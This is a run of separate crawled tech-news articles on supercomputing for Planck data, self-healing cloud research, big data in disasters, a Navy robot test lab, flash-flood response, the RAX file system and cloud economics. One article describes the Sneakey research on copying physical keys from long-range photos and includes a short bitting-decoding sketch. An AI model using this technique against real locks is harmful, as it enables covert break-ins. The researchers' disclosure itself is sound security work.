But scientists behind the project point to another particularly difficult angle to their research that necessitates a high-performance system. To get to the light sources and make accurate models, there is a lot of noise from the Planck sensors to plow through—and a lot of teasing apart of these critical signals versus the static that they are wrapped in. Project scientists point to the noise as one of the fundamental challenges of the mission and have looked to a top 20 system to solve the problem. At the heart of this signal search-and-filter process is the Opteron-powered "Hopper" Cray XE6 system that is part of the National Energy Research Scientific Computing Center (NERSC) at Lawrence Berkeley National Lab. According to NASA, the computations needed for Planck's current data release required "more than 10 million processor-hours on the Hopper computer. Fortunately, the Planck analysis codes run on tens of thousands of processors in the supercomputer at once, so this only took a few weeks." Hopper is NERSC's first petascale system; it rounded out at number 19 on the last Top 500 list with 217 TB of memory running across 153,216 cores. The center is looking to continue the Cray tradition by tapping into Cray's Cascade system, as announced around ISC last year.
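The quoted figures are easy to sanity-check. The exact number of cores used is not stated beyond "tens of thousands," so the value below is an assumption for illustration.

```python
# Rough check of the quoted figures: more than 10 million processor-hours
# spread across "tens of thousands" of cores. The core count is assumed.
processor_hours = 10_000_000
cores_in_use = 30_000            # assumption; Hopper has 153,216 cores total

wall_clock_hours = processor_hours / cores_in_use
print(f"{wall_clock_hours:.0f} hours ~= {wall_clock_hours / (24 * 7):.1f} weeks")
# About 333 hours, i.e. roughly two weeks -- consistent with "a few weeks."
```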
<urn:uuid:5e9758dc-e2ef-4289-87f6-96e98602d432>
CC-MAIN-2017-09
https://www.hpcwire.com/2013/03/25/hopper_lights_up_the_cosmos/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172018.95/warc/CC-MAIN-20170219104612-00466-ip-10-171-10-108.ec2.internal.warc.gz
en
0.926279
470
3.953125
4
What if a cloud computing infrastructure could recognize a cyberattack, eliminate it, and never stop working while all that is being done? That's what researchers at MIT, with help from the federal government, are investigating the feasibility of. Researchers at MIT's Computer Science and Artificial Intelligence Laboratory (CSAIL) have received funding from the Defense Advanced Research Projects Agency (DARPA) to bring about a cloud infrastructure that could identify cyberattacks and heal itself from any damage. DARPA has a number of ongoing research projects to develop more secure cloud environments. "The freedom, fluidity and dynamic platform that cloud computing provides also makes it particularly vulnerable to cyberattacks," according to the laboratory.

As part of the "Cloud Intrusion Detection and Repair" study, MIT researchers hope to fundamentally map how cloud networks are created and operate. Based on that, a set of guidelines will be created for the cloud network to constantly assess itself to see if it is working within those guidelines and return to its normal operating procedure if it is not. The approach is different from other security measures that disable a system when a threat is detected, creating outages, the researchers said. "Much like the human body has a monitoring system that can detect when everything is running normally, our hypothesis is that a successful attack appears as an anomaly in the normal operating activity of the system," said principal investigator Martin Rinard. "By observing the execution of a 'normal' cloud system we're going to the heart of what we want to preserve about the system, which should hopefully keep the cloud safe from attack."

The study's goal of continuing operations of the system even while under attack is a tenet of CSAIL's research. For example, other ongoing research includes studying vulnerabilities in Java applications and identifying and fixing malware in Android applications, all while the systems continue to operate.
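The article does not detail how the CSAIL system will model "normal" operation, but the underlying idea can be sketched in a few lines: learn a baseline from known-good behavior, flag large deviations, and trigger a repair action rather than shutting the system down. This is a hedged illustration of the concept, not the researchers' actual method.

```python
import statistics

class BaselineMonitor:
    """Minimal sketch of 'learn normal, flag abnormal': record a metric during
    known-good operation, then flag samples far from that baseline and invoke
    a repair action while the system keeps running."""

    def __init__(self, threshold_sigmas=3.0):
        self.samples = []
        self.threshold = threshold_sigmas

    def learn(self, value):
        self.samples.append(value)

    def check(self, value, repair):
        mean = statistics.mean(self.samples)
        stdev = statistics.pstdev(self.samples) or 1e-9
        if abs(value - mean) / stdev > self.threshold:
            repair(value)            # heal in place instead of going offline
            return False
        return True

monitor = BaselineMonitor()
for requests_per_sec in [480, 510, 495, 505, 490]:   # normal operating range
    monitor.learn(requests_per_sec)

monitor.check(502, repair=lambda v: None)                     # within baseline
monitor.check(4200, repair=lambda v: print("anomaly:", v))    # flagged, repaired
```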
<urn:uuid:adb8e434-ebc6-41f1-b076-81efcf352b0f>
CC-MAIN-2017-09
http://www.computerworld.com/article/2501740/cloud-computing/mit-takes-aim-at-secure--self-healing-cloud.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170614.88/warc/CC-MAIN-20170219104610-00586-ip-10-171-10-108.ec2.internal.warc.gz
en
0.951798
440
2.875
3
Researchers from the University of California, San Diego (Benjamin Laxton, Kai Wang and Stefan Savage) developed Sneakey, a system that correctly decoded keys from an image taken from the rooftop of a four-story building. In this case, the image was taken from 195 feet away. This demonstration shows that a motivated attacker can covertly steal a victim's keys without fear of detection. The Sneakey system provides a compelling example of how digital computing techniques can breach the security of even physical analog systems in the real world. The access control provided by a physical lock is based on the assumption that the information content of the corresponding key is private – that duplication should require either possession of the key or a priori knowledge of how it was cut. However, the ever-increasing capabilities and prevalence of digital imaging technologies present a fundamental challenge to this privacy assumption. Using modest imaging equipment and standard computer vision algorithms, the researchers demonstrate the effectiveness of physical key teleduplication – extracting a key's complete and precise bitting code at a distance via optical decoding and then cutting precise duplicates. In the paper, the researchers describe their prototype system, Sneakey, and evaluate its effectiveness, in both laboratory and real-world settings, using the most popular residential key types in the U.S.
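The paper's pipeline normalizes the key image and matches cut positions against manufacturer keying specifications; the sketch below shows only the final quantization idea, mapping measured cut depths to the nearest standard depth number. The depth table and measurements are invented for illustration and are not a real keying specification.

```python
# Illustrative only: quantize measured cut depths into a discrete bitting code.
# The depth table below is made up and is not a real manufacturer spec.
DEPTH_SPEC_MM = {0: 8.5, 1: 8.0, 2: 7.5, 3: 7.0, 4: 6.5, 5: 6.0, 6: 5.5}

def bitting_from_depths(measured_depths_mm):
    """Map each measured cut depth to the nearest standard depth number."""
    code = []
    for depth in measured_depths_mm:
        nearest = min(DEPTH_SPEC_MM, key=lambda d: abs(DEPTH_SPEC_MM[d] - depth))
        code.append(nearest)
    return code

# Depths estimated from an image (illustrative values, in millimeters).
print(bitting_from_depths([8.4, 6.1, 7.4, 5.6, 7.9]))   # -> [0, 5, 2, 6, 1]
```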
<urn:uuid:c700c435-fc7d-400e-841b-d3f241be1d69>
CC-MAIN-2017-09
https://www.helpnetsecurity.com/2008/10/31/reconsidering-physical-key-secrecy-teleduplication-via-optical-decoding/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170614.88/warc/CC-MAIN-20170219104610-00586-ip-10-171-10-108.ec2.internal.warc.gz
en
0.920115
264
2.703125
3
During a disaster, life-saving decisions are often made based on the most current information of a situation and past experiences in similar circumstances. While that’s a tried-and-true approach, the availability of complex, computer-generated data streams is changing the ball game for some emergency managers. Large volumes of data sets — commonly referred to as big data — derived from sophisticated sensors and social media feeds are increasingly being used by government agencies to improve citizen services through visualization and GIS mapping. In addition, big data is enabling responders to react to disasters more efficiently. Volunteers at Splunk, an operational intelligence software provider, are involved in a project that culls data from Twitter feeds. By analyzing keywords along with time and place information, a pattern of activity in a particular area can be unearthed. The idea was used during Superstorm Sandy. FEMA created an innovation team composed of public agencies and private companies. One of the participants was Geeks Without Bounds, a nonprofit humanitarian project accelerator, which partnered with Splunk’s charity arm, Splunk4Good, to apply the social media analysis. Team members working on the project looked at hashtags and words in Twitter feeds as well as Instagram photos related to Sandy, evacuation rates in specific areas and other keywords about resources, such as power, food, fuel and water. Using that data, the team plotted out locations where supplies might be most needed and got a finger on the pulse of a community’s sentiment about available resources. “You can imagine the ways it can be used in real time for response during an emergency,” said Stephanie Davidson, director of federal civilian sales for Splunk. “It’s really helpful for where to allocate those resources to the places that need them most.” Government agencies have been using social media data for sentiment analysis and public relations for a while. But according to Art Botterell — associate director of the Disaster Management Initiative at Carnegie Mellon University, Silicon Valley — practical use by emergency management agencies for response, recovery and preparation activities is fairly new. Botterell called current efforts of emergency managers using social media a period of rich experimentation, where decision-makers must determine whether big data derived from Twitter and Facebook should be further incorporated into practical emergency situations, or used simply as a communication tool. “This is an area that has been technology- and concept-driven, which is how most innovation happens, but now we’re getting to the point where it all falls under the big data tent [and] how do we know what is more useful and less useful,” Botterell said. “This is a conversation that I haven’t heard emergency managers having.” While computer-generated data has been a staple in decision-making processes for government and emergency personnel in the past, big data takes the volume and complexity to another level. As the data has expanded, so has the ability of companies and individuals to analyze it and apply the findings. Theresa Pardo, director of the Center for Technology in Government at the University at Albany, State University of New York, said the extent to which emergency management organizations can embrace big data relies on the culture within those agencies. 
If resources allow for analysts to spend time combing through data and putting out a presentation that is usable, high-volume data can be an asset. But Pardo admitted that's an ideal situation that's likely not present in most emergency management agencies nationwide. "That perfect model doesn't really exist everywhere," she said. "If we think about the adoption of big data, we also have to look at the maturity of … the data use environment generally within any emergency management community or agency."

Ted Okada, chief technology officer of FEMA, agreed and said that emergency agencies and the industry as a whole are still in the very early stages of using big data. As a community, he said, emergency managers need to learn how to extract the right bits of information at an early stage during a disaster. GIS was one of the first forays into complex data streams for FEMA. The agency works closely with a variety of organizations such as the National Oceanic and Atmospheric Administration and the U.S. Geological Survey to access their real-time data and create predictive models containing high-resolution maps and sensor data to help FEMA prepare for storms and other events. For example, during Sandy, FEMA accessed more than 150,000 geo-tagged photos from the Civil Air Patrol, which helped the agency perform assessments and make better decisions. "All that big data helped us very quickly come to a very definitive answer on how many people were affected," said FEMA Geospatial Information Officer Chris Vaughan. "It helped us determine who was exposed and where there were structural damages so we could do a better job of providing assistance to disaster survivors faster than we have ever done before."

Social media is a different story. Ole Mengshoel, associate research professor of electrical and computer engineering for Carnegie Mellon University, Silicon Valley, said restrictions on the availability of public data on social media sites could slow progress in using it as a reliable tool in the big-data arena. Users who protect their tweets and make their Facebook postings private limit the amount of data available and therefore impact the data's scope and dependability. From an academic point of view, Mengshoel said it "would be a pity" if big data's potential based on social media data streams wasn't reached because the companies were too protective of it. Although there are privacy and proprietary concerns with sharing some of that information, Mengshoel said that for emergency managers to truly harness the power of social media data, they'll need the ability to sample or access it.

GIS and sensor data may be easier to come by, but presenting that data in a useful form can be a daunting task. Vaughan said it is "insane" how many layers of information can be embedded on a Web-based map. The real challenge, said Vaughan, lies in putting the data in an easily understood format for emergency managers. "The faster we can provide imagery to the right person or group of people with the right assessments, it helps us streamline and make better decisions," he said. Despite the challenges, Pardo feels the attention on big data will eventually benefit the industry. She believes that because there's so much new data being generated, decision-makers will get more confident leveraging analytical information in policy development, program evaluation and delivery.
Pardo called big data's exposure in the last few years a mutually reinforcing process that draws attention to the need for a higher level of capability to use data more generally in the emergency management community, be it big or small. Event simulation is one area that Pardo felt big data could help improve. She said that as a major part of responders' preparation activities, disaster simulations can at times suffer from a lack of statistical information to fuel predictive models. So where earthquakes, hurricanes or even shoreline erosion events are being trained for, large-volume data sets could help increase the accuracy and reliability of those models. "We're in the phase right now where there's a lot of very obvious and relatively straightforward ways to use these large-volume data sets," Pardo said. "But we're just beginning to develop new analytical tools and techniques to leverage that data."

While Splunk4Good has made some inroads, Botterell said, improving efficiency using big data could take some time. Actual emergency situations aren't the best times to test the quality of data and do experiments because lives are usually at stake, he explained. Exposing people to large data sets doesn't mean decision-making will be more accurate, Okada said. He said a small but overlooked fraction of a larger set of trends can be what leads to a bad decision during a disaster. Instead of relying solely on data, Okada said a three-pronged approach can help protect decision-makers from the pitfalls of information overload. He referenced a principle from Robert Kirkpatrick, director of the Global Pulse initiative of the United Nations Secretary-General, a program that aims to harness the power of big data, as one way to prevent mistakes. Kirkpatrick advocates using the power of analytics combined with the human insight of experts and leveraging the wisdom of crowds. "That kind of data triangulation can help protect us going forward," Okada said.
<urn:uuid:29e9cd0e-1689-46cd-927c-f6cf866dbeb8>
CC-MAIN-2017-09
http://www.govtech.com/fs/news/How-Emergency-Managers-Can-Benefit-from-Big-Data.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170914.10/warc/CC-MAIN-20170219104610-00110-ip-10-171-10-108.ec2.internal.warc.gz
en
0.942268
1,786
2.921875
3
Navy's 'Hunger Games' lab will put robots to survival tests
- By Kevin McCaney - Mar 20, 2012

The Naval Research Laboratory has opened a multiclimate test lab that is being compared to a "Hunger Games" environment for robots and autonomous vehicles. The Laboratory for Autonomous Systems Research (LASR) will be used to test prototype autonomous systems in settings ranging from deserts and rain forests to waterborne and airborne environments. The lab's test areas, or bays, include one about half the size of a football field equipped with high-speed video cameras that can record up to 50 air vehicles, ground robots or human soldiers, according to InnovationNewsDaily, which compared the lab to a "Hunger Games" arena.

"The Hunger Games" is a 2008 young adult novel, soon to be released as a movie, in which large, naturalistic arenas are built for a reality TV show featuring a battle to the death among teenagers. The Navy may not be looking to stage death matches in LASR, but the robots, aircraft and amphibious vehicles will be severely tested. The rain forest bay, for example, can drop as much as 6 inches of rain per hour into an 80-degree environment with 80 percent humidity, InnovationNewsDaily reported. Or robots can try to navigate a desert climate with high winds, rock walls and a sand pit.

LASR continues the research into unmanned and autonomous systems that the Navy has been doing since 1923, NRL said in a statement. The new lab will help support the military's growing use of unmanned aerial vehicles, ground robots and other autonomous systems. The lab, which was officially opened March 16 at NRL in Washington, D.C., features five specific test areas.

- Prototyping High Bay, which is for small autonomous air and ground vehicles and the people who use them, has the world's largest real-time motion-capture volume, allowing scientists to get extremely accurate ground truth of the motion of vehicles and people, as well as allowing closed-loop control of systems.
- Littoral High Bay features a 45-foot by 25-foot by 5.5-foot-deep pool with a wave generator capable of producing directional waves, and a slope that allows littoral environments to be recreated.
- Desert High Bay contains a 40-foot by 14-foot area of sand 2.5 feet deep, with 18-foot-high rock walls that allow testing of robots and sensors in a desert-like environment.
- Tropical High Bay is a 60-foot by 40-foot greenhouse that contains a re-creation of a southeast Asian rain forest, complete with all that rain, heat and humidity.
- The Outdoor Test Range is a one-third-acre highland forest with a waterfall, stream and pond, and terrain of differing difficulty including large boulder structures and earthen berms.

LASR also has electrical and machine shops where prototypes can be built. Among the tools available are 3-D prototyping machines that can make parts directly from computer-aided design drawings, a sensor lab with large environmental and altitude chambers, and a power and energy lab.

Kevin McCaney is a former editor of Defense Systems and GCN.
<urn:uuid:467ea149-2e2f-4b18-b3f1-b7a2b6ed4fee>
CC-MAIN-2017-09
https://gcn.com/articles/2012/03/20/navy-lasr-hunger-games-lab-robots.aspx?admgarea=TC_EmergingTech
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171781.5/warc/CC-MAIN-20170219104611-00638-ip-10-171-10-108.ec2.internal.warc.gz
en
0.940683
703
2.9375
3
Flooding rains are not uncommon in Central Texas. The region has long been known as "Flash Flood Alley" due to its hilly terrain, shallow soils, and proximity to the moisture-laden Gulf of Mexico. When rain falls, it essentially has two options: soak into the soil, or flow downhill; the shallow and rocky soils of the Hill Country limit the former, so even a moderate rain causes runoff. The weekend of Memorial Day 2015, however, was something else entirely. Over a period of a few hours, between nine and 12.5 inches of rain fell over a wide range of the Hill Country - much of which fell within the watersheds of the Blanco and San Marcos rivers. A foot of rainfall - a third of a typical year's total - inundated the region in just a few hours, and had to go somewhere. The result was a catastrophic flash flood. The Blanco River rose 17 feet in a half hour, and 33 feet in a three-hour span, peaking far higher than had ever been recorded or even thought possible. Towering cypress trees that had survived six centuries of drought and flood were no match for this monstrous storm. In the lead photo to this story, massive cypress trees have been stripped of bark and branches 30 feet above the normally-placid river's surface. Ultimately, a 40-foot wall of water rushed downstream, scouring away everything in its path: trees, vehicles, homes, bridges, and unfortunately, people. Shortly afterward I wrote of the amazing resilience embedded in Texas culture. Texas has a long history of neighbors helping neighbors, and that culture showed itself after this disaster. From the many volunteers searching for the missing, to local businesses offering to replace vital necessities, to an impromptu clearinghouse to lend and borrow heavy equipment, watching the community set about the business of recovering has been an inspiration. Individual resilience is not enough in the face of a disaster of this magnitude though. Rebuilding hundreds of homes, roadway infrastructure, communications, and the other essentials of modern life requires a coordinated effort. Whether cyber or physical, some lessons apply in any disaster. Lesson 1: Preparedness In the midst of a crisis an organization falls back on its planning and preparedness. When an incident occurs, it is too late to put together a response plan. Flash floods are a known threat in Central Texas, and the region has several initiatives to address this threat. The City of Austin Flood Early Warning System reports the current state of over 1,000 "low water crossings" - often little more than a roadway with a culvert to allow a creek to pass beneath; during heavy rain, these crossings will frequently be temporarily impassable. The counties have spent years building awareness: 18 to 24 inches of moving water is enough to sweep most vehicles off the road. The saying "Turn Around, Don't Drown" is ingrained in the minds of residents. Ten counties in the greater Austin area participate in a Regional Notification System, whereby residents and interested parties can register their landlines and cell phones to receive notification of threats to life or property. Hays County has a long-standing volunteer Community Emergency Response Team trained to respond to wildfires, tornadoes, car wrecks, and flash floods. Hays County has set up haysinformed.com as a central location for authoritative information during an emergency.
All of these steps required time to plan and to implement - and all were in place long before this crisis arose. Lesson 2: Damage control During an incident, damage control is the first rule. In a cyber event, you may be able to isolate the compromised environment to prevent further damage. You don't contain 10 billion gallons of rushing water though, so you do the next best thing: get out of the way. Amazingly, in a flash flood that destroyed 320 homes during the middle of the night, only 12 individuals were swept away. One was rescued the following morning and is alive today. Nine have been recovered deceased. Tragically, the two remaining unaccounted for are a 6-year-old boy, and the 4-year-old daughter of the rescued survivor. In this event, "damage control" took a multi-pronged approach. The National Weather Service had issued a flash flood watch early Saturday, but the situation did not become critical until around midnight Saturday night/Sunday morning. The NWS archive records the increasingly dire warnings as the reality of this event unfolded. This leads to lesson three...
<urn:uuid:4abdc7c2-37de-433d-aa1a-55602c6aa783>
CC-MAIN-2017-09
http://www.csoonline.com/article/2938999/emergency-preparedness/incident-response-lessons-from-a-flash-flood.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170925.44/warc/CC-MAIN-20170219104610-00458-ip-10-171-10-108.ec2.internal.warc.gz
en
0.958927
938
2.71875
3
Boston University (BU) developed its own timesharing system in the 1970s for its IBM 360 and 370 mainframes. The system was based on the batch-oriented Remote Access Computing System (RAX) developed by IBM. McGill University also participated in RAX development, but their version was renamed "McGill University System for Interactive Computing" (MUSIC). Although many of the details are lost in the mists of time, both systems used some text processing tools developed at BU. At the time, IBM had developed a few timesharing systems, but they were generally expensive and slow.

IBM's standard operating systems for the 360 series had a file system; files were referred to as data sets. To put matters as charitably as possible, IBM's data set support was not suited to the dynamic nature of file access in timesharing environments. Frankly, it was a beast. So RAX really needed its own file system. In accordance with the traditions of IBM data processing, a RAX file looked more-or-less like a deck of punched cards. Files consisted of "records" that carried individual lines of text. Unlike punched cards, trailing blanks were omitted and the individual records (lines) could vary in length. More significantly, files were either read sequentially in a single pass, or written sequentially in a single pass. There wasn't any notion of random access or of modifying the middle of a file without rewriting the whole thing. While RAX did support random access to hard drive files, the function was limited to specially allocated files (standard IBM data sets, actually) and used special operations that were only available to assembly language programmers. Each file had a unique name and was 'owned' by the user that created it. Users could modify the permissions on files to share them with other users.

The RAX system's timesharing hours were generally limited to daytime and evenings. Overnight, the CPU was rebooted with IBM's OS/360 or OS/VS1 to run batch jobs. Thus, the RAX hard drives had to be compatible with IBM's native file system, such as it was. The RAX library was implemented inside a collection of IBM data sets, each data set serving as a pool of disk blocks to use in library files. These disk blocks were called space sets and contained 512 bytes each. A complete RAX library file name contained two parts: an 8-character index name and an 8-character file name. While this gave the illusion of there being a hierarchical file system, there was no true 'root' directory. All files not used by the RAX system programming staff resided in the "userlib" index; if no index name was given, RAX searched in userlib.

The directory arrangement apparently worked as follows: There were a small number of IBM data sets that served as library directories (indexes). A file's index name selected the appropriate data set to search for that file's directory entry. These index files were apparently set up using IBM's Indexed Sequential Access Method (ISAM). Such files were specially formatted to use a feature of the IBM disk hardware. Each data block in the file contained a key field along with space for a library file's directory entry. The "key" part contained the file name. The IBM disk hardware could be told to scan the data set until it found the record whose key contained that name, and then it would retrieve the corresponding data. This put the burden of directory searching on the hard drive, and freed up the CPU to work on other tasks.
The directory entry contained the usual timestamps (date created, accessed, modified, etc.), ownership information, access permissions, size, and a pointer to the first space set in the file. Once the system knew the location of the file's first space set, it could retrieve the file's contents sequentially.

A space set address was a 32-bit number formatted in two fields: a lib file number and a space set number within that lib file. Remember that the library consisted of numerous data sets that served as pools of data blocks. These pools were called lib files, and were numbered sequentially. The data blocks, or space sets, were numbered sequentially inside each lib file.

Files within the RAX library were implemented as a list of linked space sets. The first four bytes of each space set carried the pointer to the next one in the file. The pointer bytes were managed automatically by the system's read and write operations; they were invisible to user programs. The net result was that user programs perceived space sets as containing only 508 bytes, since 4 bytes were used for the link pointer.

A single library file could contain space sets from many different lib files. Since each lib file tended to represent a contiguous set of disk space, file retrieval was most efficient when all space sets came from the same lib file. In practice, however, a file would incorporate space sets from whichever lib file had the most available. Free space was managed within individual lib files: each lib file kept a linked list of free space sets, and space sets from deleted files were added back to the free list in the appropriate lib file.

Here is a review of the design issues listed above:
- File data structure – variable-length records that more or less corresponded to lines of text.
- File block structure – uses a linked list to organize randomly located disk blocks into a sequential file.
- Directories – effectively a single-level directory structure with user permissions and timestamps.
- Free space – managed in arbitrary, locally maintained lists. Any block can be in any file, eliminating fragmentation problems.
- Easy to implement – built atop a rich IBM-oriented I/O mechanism; simple to implement in that environment, but hard to replicate in non-IBM environments.
- Speed – directory lookup is very fast. File data access is rarely optimized, though.
- Sequential vs. direct – the system really only supports sequential access.
- Storage sizes – can combine data sets on multiple drives to store perhaps 2 TB of data, assuming 512-byte space sets. Individual files are probably limited to 4 GB by the size field in the directory entry.
- Robustness – links are brittle. System crashes could cause link inconsistencies and the risk of a file's link pointing to a space set on the free list. However, file replacement did not eliminate the old file and its chain of space sets until the new file's chain had been completely built, so system crashes during such updates would usually leave the previous file intact.
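The linked space-set layout is easy to picture in code. The sketch below is a modern reconstruction, not RAX source: the split of the 32-bit address into a lib file number and a space set number follows the description above, but the 16/16 field widths, the big-endian link pointer, and the use of a zero address as the end-of-chain marker are assumptions made purely for illustration.

```python
# Hypothetical reconstruction of RAX space-set addressing and file retrieval.
# Field widths, byte order, and the end-of-chain marker are assumptions.

SPACE_SET_SIZE = 512                         # bytes per space set
LINK_SIZE = 4                                # first 4 bytes point to the next space set
PAYLOAD_SIZE = SPACE_SET_SIZE - LINK_SIZE    # 508 bytes visible to user programs

def split_address(addr):
    """Split a 32-bit space-set address into (lib_file, space_set) fields.

    The 16/16 split is illustrative only; the article does not give the widths.
    """
    return (addr >> 16) & 0xFFFF, addr & 0xFFFF

def read_file(first_addr, read_space_set):
    """Walk a file's chain of space sets, yielding each 508-byte payload.

    `read_space_set(lib_file, space_set)` stands in for the disk I/O that
    returns one raw 512-byte block; an all-zero address is assumed to mark
    the end of the chain.
    """
    addr = first_addr
    while addr != 0:
        lib_file, space_set = split_address(addr)
        block = read_space_set(lib_file, space_set)
        yield block[LINK_SIZE:]                          # user-visible 508 bytes
        addr = int.from_bytes(block[:LINK_SIZE], "big")  # follow the link pointer
```

The same walk, run over a lib file's free list instead of a file's chain, is essentially how the free-space management described above would operate.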
Cloud computing promises to displace wholly owned information technology hardware and software. How does this assertion stand up over time?

When the price of a durable item remains stable, the market for that item tends toward equilibrium between the item's cost of ownership and its rental or lease rate. When the price is near that equilibrium, other factors influence the decision to buy or rent. For instance, a person may choose to buy, lease or rent a car. In New York City, a person may dispense with a car entirely, relying instead on taxis or mass transit. The "hassle factor"—the cost of parking and insurance—overwhelms the value of independent means of transportation. As another example, economists speak of the balance between the cost of home ownership and the price of renting an apartment. An apartment isn't a home, but they provide similar enough functions to make a price comparison meaningful. For some people, moving from a home to an apartment or condominium makes sense. Renting reduces the hassle factor.

These scenarios rely on stable prices over time. If the item's price changes, the balance between ownership and renting shifts. When the price of a home steadily rises, the home becomes a good investment, despite the hassle factor of home ownership. Seeing the value of a new car drop in the first year of ownership, some people choose to lease. Others may buy, holding the car for much longer, and put up with the hassle factor of having an older car.

Information technology faces similar economics. When the price of computing was very high, most users rented (using time-sharing). The lower price of computing over time led more businesses to buy, and those businesses could afford greater amounts of computational power. Increasingly powerful and affordable computing environments addressed larger sets of data and more complex algorithms. The range of problems itself didn't change, but the cost of solving those problems dropped as the cost of technology steadily declined. Problems that had been impossible to solve became expensive to solve, and eventually became inexpensive to solve. For instance, American Airlines created a powerful competitive advantage by deploying the Sabre online reservation system in the '60s. Now, any airline that doesn't have an online reservation system isn't a real airline. Companies across many industries applied computing following two mandates: Wherever there were 50 people doing the same thing, automate; and wherever there were 50 people waiting for one person to do something, automate.

Companies with large computing infrastructures discovered their available spare capacity. A company with a million servers running at 98 percent utilization realized it had the equivalent of 20,000 machines idle. The executives knew capacity wasn't waste, but simply the consequence of varying workload. They also realized they could "rent out" small chunks of their available computing resource, as long as they could fence those users from the internal processing the company needed to run. These companies re-created the time-sharing model and monetized their idle spare capacity.

Smaller organizations valued cloud computing. It eliminated a barrier to entry for software development firms. Software start-ups once raised capital to purchase technology for development and test. With cloud, they could rent just the capacity they needed for the time they required.
Larger firms could get additional capacity to deal with workload spikes, and then release that capacity when the demand lessened. Companies of all sizes rediscovered that most of their IT workload could run on a generic computational resource. They realized renting was cheaper than owning, especially when they considered the hassle factor.

This appealing economic model deteriorates as the underlying price of technology drops. Would any venture capital firm fund a start-up that intended to deliver cloud computing? Today's cloud computing providers rely on the sunk cost of their existing infrastructure. The initial capital expense is an insurmountable barrier to entry, as long as that cost remains high.

The cost of computing continues to drop, eroding that barrier to entry. Today's start-up can acquire multicore computing platforms for a few hundred dollars. A midsized company can acquire computing capacity at one-eighth to one-sixty-fourth the price charged five years ago. This represents the continuing impact of Moore's Law, which lowers the unit cost of computing by half every nine, 12 or 18 months, compounded across a five-year horizon. (Network capacity tends to double at unit cost over nine months, disk storage over a year and processors at the longer end of the scale.)

The Upside of the Hassle Factor

Today's public cloud provider will presumably continue to grow, but not exponentially. In five years, the cost of their marginal capacity will be miniscule compared to today's prices. Public cloud consumers will realize the hassle factor associated with owning technology is trivial compared with the business risk of depending on someone else's availability, security, recoverability, privacy, service levels and overall care of their Internet-connected generic technology. Companies will rediscover the benefits of having a captive IT supplier staffed by its own employees. When a public cloud fails, all it can give its customers is more capacity at a lower price, later. An executive has more choices when managing his or her own IT staff should they fail to deliver what the business needs. That's the upside of the hassle factor.

Is there any long-term viable strategy for a public cloud vendor? The first challenge would be to ride the price/performance improvements as rapidly as they arrive, so the business would have to continually invest in new IT—which is costly. Firms such as Google, Microsoft and Amazon, which have already invested heavily in IT, have developed brilliant innovations to contain costs. Modular design with minimal site preparation. Power and cooling added as needed. Standardized containers delivered and wired in on demand. Amazon also builds modular data centers to minimize construction costs and optimize heating, cooling, cable runs and energy consumption. These businesses strive relentlessly for margin performance through monetizing unused capacity—but the core business drives their IT procurement strategy. A public cloud vendor has no funding source to support that level of IT investment.

If a public cloud vendor could identify a core set of long-term customers that guaranteed to spend at least some amount annually, that could anchor the public cloud vendor similarly to a large department store anchoring a shopping mall. All the existing public cloud vendors have such a customer—their parent company. But a customer of cloud who promises to spend a minimum amount annually, regardless of actual utilization, isn't buying cloud computing—they're outsourcing.
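The Moore's Law arithmetic cited above is easy to check. The sketch below is an illustration only: the halving periods are the rough figures quoted in this article, and real price curves are far lumpier than a smooth exponential.

```python
# Rough check of the five-year price decline implied by different
# cost-halving periods (illustrative; real pricing is not this smooth).
def price_factor(months_elapsed, halving_period_months):
    """Fraction of the original unit cost remaining after `months_elapsed`."""
    return 0.5 ** (months_elapsed / halving_period_months)

for period in (9, 12, 18):
    factor = price_factor(60, period)  # five-year horizon
    print(f"halving every {period:2d} months: about 1/{round(1 / factor)} of today's price")

# Halving every 18 months leaves roughly one-tenth of the price; every 9 months,
# roughly one-hundredth, which is in the same ballpark as the one-eighth to
# one-sixty-fourth range cited above.
```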
The cost/benefit analysis between an external supplier and a captive supplier comes down to this: Can the business run its data center efficiently enough to compete with an outsourcer? The outsourcer has the same capital costs, software costs, personnel costs and also must make a profit. If a business is inefficient, cloud is only half the solution. The whole solution is either outsourcing or running the data center more efficiently.

Public cloud vendors exploit the temporary difference between the decreasing cost of computing and the increasing demand. As that cost continues to drop, those businesses that need computing will find it increasingly affordable. More and more complex problems will be tractable with owned resources. The benefits of ownership will outweigh the apparent simplicity of public cloud. Cloud computing will continue—but as private and community cloud, not public cloud. For some companies, the great migration to public cloud will flow in reverse. For most companies, it will stop before it even begins.

As the market dries up, the end game will evolve as W. Chan Kim and Renée Mauborgne describe in Blue Ocean Strategy. Expect to see frantic attempts at service differentiation and price wars as public cloud providers collapse into a "red ocean."

Note: This article follows the "NIST Definition of Cloud Computing" as defined in NIST SP 800-145, from http://csrc.nist.gov/publications/nistpubs/800-145/SP800-145.pdf. The key elements of this definition are on-demand self-service, broad network access, resource pooling, rapid elasticity and measured service. Public cloud refers to cloud capabilities available to the general public.
The US government is setting out to address concerns about security in the cloud. The US National Institute of Standards and Technology has issued a draft document looking at issues such as privacy and security within cloud environments. The institute has also sought to tackle the uncertainty and confusion that surrounds the technology by introducing a document that sets out a series of definitions of cloud computing.

The Guidelines on Security and Privacy in Public Cloud (registration required) examines some of the security issues facing cloud providers and customers and offers a series of recommendations for organisations to consider when outsourcing data, applications and infrastructure to a public cloud environment. The report, written by NIST computer scientists Tim Grance and Wayne Jansen, stressed the importance of building in security from the outset: "To maximise effectiveness and minimize costs, security and privacy must be considered from the initial planning stage at the start of the systems development life cycle. Attempting to address security after implementation and deployment is not only much more difficult and expensive, but also more risky."

The report goes on to point out the importance of recognising that the cloud provider has little or no understanding of its customers' individual security requirements. "Organisations should require that any selected public cloud computing solution is configured, deployed, and managed to meet their security, privacy, and other requirements," warns the document. Other issues for customers include ensuring that the client-side computing environment meets the organisation's security and privacy requirements for cloud computing and that the organisation retains accountability for its data and applications deployed in the cloud.

The new cloud definition document, The NIST Definition of Cloud Computing, is NIST's contribution to the debate on cloud services. In its introduction, it points out that "Cloud computing is still an evolving paradigm. Its definition, use cases, underlying technologies, issues, risks, and benefits will be refined and better understood with a spirited debate by the public and private sectors." The NIST is looking for public comments on the documents, which must be submitted by 28 February.

